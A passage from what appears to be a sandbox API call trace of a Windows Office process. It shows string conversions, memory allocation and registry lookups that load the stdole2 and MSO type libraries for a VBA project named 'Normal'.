out: _Buffer="5338") returned 0x0 [0232.277] strnlen (_Str="5338", _MaxCount=0x18) returned 0x4 [0232.277] _i64toa_s (in: _Value=5422, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="152e") returned 0x0 [0232.277] strnlen (_Str="152E", _MaxCount=0x18) returned 0x4 [0232.277] _i64toa_s (in: _Value=647634, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="647634") returned 0x0 [0232.277] strnlen (_Str="647634", _MaxCount=0x18) returned 0x6 [0232.277] _i64toa_s (in: _Value=9386, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="24aa") returned 0x0 [0232.277] strnlen (_Str="24AA", _MaxCount=0x18) returned 0x4 [0232.277] _i64toa_s (in: _Value=389774, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="389774") returned 0x0 [0232.277] strnlen (_Str="389774", _MaxCount=0x18) returned 0x6 [0232.277] _i64toa_s (in: _Value=5062, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="13c6") returned 0x0 [0232.277] strnlen (_Str="13C6", _MaxCount=0x18) returned 0x4 [0232.277] _i64toa_s (in: _Value=86000, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="86000") returned 0x0 [0232.277] strnlen (_Str="86000", _MaxCount=0x18) returned 0x5 [0232.277] _i64toa_s (in: _Value=1075, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="433") returned 0x0 [0232.277] strnlen (_Str="433", _MaxCount=0x18) returned 0x3 [0232.277] _i64toa_s (in: _Value=211462, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="211462") returned 0x0 [0232.278] strnlen (_Str="211462", _MaxCount=0x18) returned 0x6 [0232.278] _i64toa_s (in: _Value=4597, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="11f5") returned 0x0 [0232.278] strnlen (_Str="11F5", _MaxCount=0x18) returned 0x4 [0232.278] _i64toa_s (in: _Value=685630, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="685630") returned 0x0 [0232.278] strnlen (_Str="685630", _MaxCount=0x18) returned 0x6 [0232.278] _i64toa_s (in: _Value=5962, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="174a") returned 0x0 [0232.278] strnlen (_Str="174A", _MaxCount=0x18) returned 0x4 [0232.278] _i64toa_s (in: _Value=78, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="78") returned 0x0 [0232.278] strnlen (_Str="78", _MaxCount=0x18) returned 0x2 [0232.278] _i64toa_s (in: _Value=189, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="bd") returned 0x0 [0232.278] strnlen (_Str="BD", _MaxCount=0x18) returned 0x2 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e82 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.278] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x4) returned 0x1d3a409ecf0 [0232.279] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3a409ecf0) [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cf2 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3171556 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e5e | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e82 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cf2 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172ea6 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c3e | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cf2 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172ece | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _i64toa_s (in: _Value=200, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="200") returned 0x0 [0232.279] strnlen (_Str="200", _MaxCount=0x18) returned 0x3 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cf2 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172efe | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xd) returned 0x1d38efb3e80 [0232.279] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d38efb3e80) [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c1a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172bba | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c1a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3171556 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c1a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3171bfe | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cce | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c1a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3171e0a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c3e | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c1a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172f26 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c86 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cce | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.279] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172cce | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.280] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c1a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.280] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3170506 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.280] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172caa | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.280] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3171556 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.280] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172c86 | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.284] wcscpy_s (in: _Destination=0x33e4fb0630, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0232.284] _ltow_s (in: _Value=2, _Buffer=0x33e4fb063c, _BufferCount=0x3a, _Radix=16 | out: _Buffer="2") returned 0x0 [0232.284] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39d9c99d0 [0232.284] qsort (in: _Base=0x1d39d83bb30, _NumOfElements=0xc, _SizeOfElements=0x8, _PtFuncCompare=0x7ffce0952980 | out: _Base=0x1d39d83bb30) [0232.285] wcsncpy_s (in: _Destination=0x33e4faf250, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0232.285] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0232.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4faf180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0232.285] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0232.286] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x408) returned 0x1d3a432e630 [0232.286] qsort (in: _Base=0x1d39d83d3f0, _NumOfElements=0x8, _SizeOfElements=0x8, _PtFuncCompare=0x7ffce0952980 | out: _Base=0x1d39d83d3f0) [0232.289] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9c99d0) [0232.289] wcscpy_s (in: _Destination=0x33e4fb0630, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0232.289] _ltow_s (in: _Value=3, _Buffer=0x33e4fb063c, _BufferCount=0x3a, _Radix=16 | out: _Buffer="3") returned 0x0 [0232.290] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39d9c8440 [0232.291] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9c8440) [0232.291] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39d9ca6c0 [0232.292] wcscpy_s (in: _Destination=0x7ffce0c08506, _SizeInWords=0x1fd, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0232.292] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d9805f0, cb=0x220) returned 0x1d38ef54750 [0232.292] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d995d00, cb=0x54) returned 0x1d3a4137b40 [0232.294] SysStringByteLen (bstr="") returned 0x0 [0232.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286518, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0232.294] SysStringByteLen (bstr="") returned 0x0 [0232.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286518, cbMultiByte=1, lpWideCharStr=0x1d39dc856e8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0232.294] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x33e4fb0520 | out: phkResult=0x33e4fb0520*=0xed6) returned 0x0 [0232.294] RegOpenKeyW (in: hKey=0xed6, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x33e4fb0518 | out: phkResult=0x33e4fb0518*=0x806) returned 0x0 [0232.295] RegEnumKeyW (in: hKey=0x806, dwIndex=0x0, lpName=0x33e4fb0548, cchName=0xa | out: lpName="1.0") returned 0x0 [0232.295] RegEnumKeyW (in: hKey=0x806, dwIndex=0x1, lpName=0x33e4fb0548, cchName=0xa | out: lpName="2.0") returned 0x0 [0232.295] wcscpy_s (in: _Destination=0x33e4fb0530, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0232.295] RegOpenKeyW (in: hKey=0x806, lpSubKey="2.0", phkResult=0x33e4fb05d8 | out: phkResult=0x33e4fb05d8*=0x80a) returned 0x0 [0232.295] _ultoa_s (in: _Val=0x0, _DstBuf=0x33e4fb0550, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0232.295] RegOpenKeyA (in: hKey=0x80a, lpSubKey="0", phkResult=0x33e4fb0540 | out: phkResult=0x33e4fb0540*=0x10b2) returned 0x0 [0232.295] RegOpenKeyW (in: hKey=0x10b2, lpSubKey="win64", phkResult=0x33e4fb0548 | out: phkResult=0x33e4fb0548*=0x10da) returned 0x0 [0232.295] RegCloseKey (hKey=0x10da) returned 0x0 [0232.295] RegCloseKey (hKey=0x10b2) returned 0x0 [0232.295] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb05e0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0232.295] RegOpenKeyW (in: hKey=0x80a, lpSubKey="0", phkResult=0x33e4fb05b8 | out: phkResult=0x33e4fb05b8*=0x10b2) returned 0x0 [0232.296] RegQueryValueW (in: hKey=0x10b2, lpSubKey="win64", lpData=0x33e4fb0600, lpcbData=0x33e4fb05b4 | out: lpData="C:\\Windows\\System32\\stdole2.tlb", lpcbData=0x33e4fb05b4) returned 0x0 [0232.296] wcscpy_s (in: _Destination=0x33e4fb0880, _SizeInWords=0x104, _Source="C:\\Windows\\System32\\stdole2.tlb" | out: _Destination="C:\\Windows\\System32\\stdole2.tlb") returned 0x0 [0232.296] RegCloseKey (hKey=0x10b2) returned 0x0 [0232.296] RegCloseKey (hKey=0x80a) returned 0x0 [0232.296] RegCloseKey (hKey=0x806) returned 0x0 [0232.296] RegCloseKey (hKey=0xed6) returned 0x0 [0232.296] LoadTypeLib (in: szFile="C:\\Windows\\System32\\stdole2.tlb", pptlib=0x33e4fb0c40*=0x0 | out: pptlib=0x33e4fb0c40*=0x1d3980655f0) returned 0x0 [0232.296] ITypeLib:RemoteGetDocumentation (in: This=0x1d3980655f0, index=-1, refPtrFlags=0xe4fb0c50, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d300000000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d300000000) returned 0x0 [0232.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0232.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=6, lpMultiByteStr=0x33e4fb06e0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 6 [0232.297] CLSIDFromString (in: lpsz="{00020430-0000-0000-C000-000000000046}", pclsid=0x33e4fb0b40 | out: pclsid=0x33e4fb0b40*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0232.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0232.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchWideChar=94, lpMultiByteStr=0x33e4fb0720, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", lpUsedDefaultChar=0x0) returned 94 [0232.297] IUnknown:Release (This=0x1d3980655f0) returned 0x9 [0232.297] wcsncpy_s (in: _Destination=0x33e4fb08e0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0232.297] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0232.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb0810, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0232.297] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0232.297] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286518, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0232.297] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a4286518, cbMultiByte=7, lpWideCharStr=0x1d39dc856e8, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0232.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0232.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=6, lpMultiByteStr=0x33e4fb06e0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 6 [0232.297] wcscpy_s (in: _Destination=0x7ffce0c08506, _SizeInWords=0x1fd, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0232.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0232.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x33e4fb0720, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\CNormal", lpUsedDefaultChar=0x0) returned 9 [0232.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0232.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x33e4fb0720, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\CNormal", lpUsedDefaultChar=0x0) returned 9 [0232.298] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x33e4fb0520 | out: phkResult=0x33e4fb0520*=0xed6) returned 0x0 [0232.298] RegOpenKeyW (in: hKey=0xed6, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x33e4fb0518 | out: phkResult=0x33e4fb0518*=0x80a) returned 0x0 [0232.298] RegEnumKeyW (in: hKey=0x80a, dwIndex=0x0, lpName=0x33e4fb0548, cchName=0xa | out: lpName="2.6") returned 0x0 [0232.298] RegEnumKeyW (in: hKey=0x80a, dwIndex=0x1, lpName=0x33e4fb0548, cchName=0xa | out: lpName="2.7") returned 0x0 [0232.299] RegEnumKeyW (in: hKey=0x80a, dwIndex=0x2, lpName=0x33e4fb0548, cchName=0xa | out: lpName="2.8") returned 0x0 [0232.299] wcscpy_s (in: _Destination=0x33e4fb0530, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0232.299] RegOpenKeyW (in: hKey=0x80a, lpSubKey="2.8", phkResult=0x33e4fb05d8 | out: phkResult=0x33e4fb05d8*=0x10da) returned 0x0 [0232.299] _ultoa_s (in: _Val=0x0, _DstBuf=0x33e4fb0550, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0232.299] RegOpenKeyA (in: hKey=0x10da, lpSubKey="0", phkResult=0x33e4fb0540 | out: phkResult=0x33e4fb0540*=0x1412) returned 0x0 [0232.299] RegOpenKeyW (in: hKey=0x1412, lpSubKey="win64", phkResult=0x33e4fb0548 | out: phkResult=0x33e4fb0548*=0x1316) returned 0x0 [0232.299] RegCloseKey (hKey=0x1316) returned 0x0 [0232.299] RegCloseKey (hKey=0x1412) returned 0x0 [0232.300] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb05e0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0232.300] RegOpenKeyW (in: hKey=0x10da, lpSubKey="0", phkResult=0x33e4fb05b8 | out: phkResult=0x33e4fb05b8*=0xcbe) returned 0x0 [0232.300] RegQueryValueW (in: hKey=0xcbe, lpSubKey="win64", lpData=0x33e4fb0600, lpcbData=0x33e4fb05b4 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x33e4fb05b4) returned 0x0 [0232.300] wcscpy_s (in: _Destination=0x33e4fb0880, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0232.300] RegCloseKey (hKey=0xcbe) returned 0x0 [0232.300] RegCloseKey (hKey=0x10da) returned 0x0 [0232.300] RegCloseKey (hKey=0x80a) returned 0x0 [0232.300] RegCloseKey (hKey=0xed6) returned 0x0 [0232.300] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x33e4fb0c40*=0x0 | out: pptlib=0x33e4fb0c40*=0x1d3985c5700) returned 0x0 [0232.300] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c5700, index=-1, refPtrFlags=0xe4fb0c50, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d300000000 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d300000000) returned 0x0 [0232.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0232.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=6, lpMultiByteStr=0x33e4fb06e0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", 